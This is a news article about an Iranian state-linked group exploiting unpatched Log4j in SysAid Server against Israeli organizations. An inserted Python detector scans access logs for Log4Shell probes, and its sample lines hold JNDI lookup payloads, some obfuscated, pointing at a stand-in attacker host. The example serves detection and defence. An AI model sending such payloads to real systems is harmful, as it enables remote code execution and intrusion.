Iranian state-sponsored actors are still exploiting unpatched systems running Log4j to target Israeli entities, a sign of how long a tail the vulnerability has for remediation.
Microsoft attributed the latest set of activity to the umbrella threat group it tracks as MuddyWater (aka Cobalt Ulster, Mercury, Seedworm, or Static Kitten), which is linked to Iran's intelligence apparatus, the Ministry of Intelligence and Security (MOIS).
The attacks are notable for using SysAid Server instances left unpatched against the Log4Shell vulnerability as the initial access vector, a departure from the actors' established pattern of leveraging VMware applications to breach target environments.
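The article states only that unpatched Log4j behind SysAid Server served as the initial access vector. The following added example (not code from the article, Microsoft, or SysAid) shows a defender-side check over web access logs: it collapses the Log4j lookup obfuscation commonly wrapped around "jndi" (case-changing and default-value lookups) and flags the resulting JNDI lookup strings. The log lines and the attacker.invalid host are constructed for the example.

```python
import re

# Constructed Apache-style access log lines (not taken from the article). The web
# application is assumed to log the User-Agent header verbatim, as a Log4j-backed app might.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [23/Jul/2022:10:01:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Jul/2022:10:01:09 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.invalid/a}"',
    '203.0.113.9 - - [23/Jul/2022:10:02:11 +0000] "GET /api HTTP/1.1" 200 88 "-" "${${lower:j}${upper:n}di:${lower:r}mi://attacker.invalid/x}"',
    '203.0.113.11 - - [23/Jul/2022:10:02:40 +0000] "GET /api HTTP/1.1" 200 88 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.invalid/x}"',
    '203.0.113.12 - - [23/Jul/2022:10:03:00 +0000] "GET /status HTTP/1.1" 200 10 "-" "curl/7.68.0"',
]

# Log4j lookups commonly nested around "jndi" to defeat naive keyword matching:
#   ${lower:X} / ${upper:X} change the case of X; ${name:-X} yields the default value X.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# What matters after normalization: a JNDI lookup with any scheme (ldap, rmi, dns, ...).
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Resolve nested case/default lookups innermost-first until the string stops
    changing (or max_rounds is hit), so obfuscated payloads collapse to plain form."""
    for _ in range(max_rounds):
        resolved = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        resolved = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), resolved)
        if resolved == text:
            return text
        text = resolved
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line carries a JNDI lookup once obfuscating lookups are resolved."""
    return _JNDI_LOOKUP.search(normalize(line)) is not None


def scan(lines):
    """Return one finding per suspicious line: its index, the client IP (first field
    of the access log line) and the normalized JNDI payload that was matched."""
    findings = []
    for idx, line in enumerate(lines):
        match = _JNDI_LOOKUP.search(normalize(line))
        if match:
            findings.append({
                "line": idx,
                "source_ip": line.split(" ", 1)[0],
                "payload": match.group(0),
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG_LINES):
        print(f"line {finding['line']}: {finding['source_ip']} sent {finding['payload']}")
```

The normalization step is what makes this more than a grep for `jndi`: the third and fourth constructed lines never contain that substring literally, yet both collapse to a plain JNDI lookup. The check covers only the lookup families shown here; a hit in access logs indicates probing, not necessarily a successful exploit, and it is a complement to patching Log4j, not a substitute.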
“Once access is gained, Mercury establishes persistence, dumps credentials, and moves laterally within the targeted organization using both custom and well-known hacking tools, as well as built-in operating system tools for its hands-on-keyboard attack,” Microsoft said.
The tech giant’s threat intelligence team said it observed attacks between July 23 and 25, 2022.
A successful compromise is said to have been followed by the deployment of web shells to execute commands that let the actor conduct reconnaissance, establish persistence, steal credentials, and facilitate lateral movement.
Also used for command-and-control (C2) communication during the intrusions were a remote monitoring and management software called eHorus and Ligolo, a reverse tunneling tool favored by the adversary.
The findings come as the U.S. Department of Homeland Security's Cyber Safety Review Board (CSRB) deemed the critical vulnerability in the open source Java-based logging framework an endemic weakness that will continue to plague organizations for years to come as exploitation evolves.
Because Log4j is embedded in a wide range of software and services from many vendors, sophisticated adversaries such as nation-state actors and commodity operators alike have had the opportunity to exploit the vulnerability to mount a variety of attacks.
The Log4Shell attacks also follow a recent Mandiant report detailing an espionage campaign aimed at Israeli shipping, government, energy, and healthcare organizations by a likely Iranian hacking group tracked as UNC3890.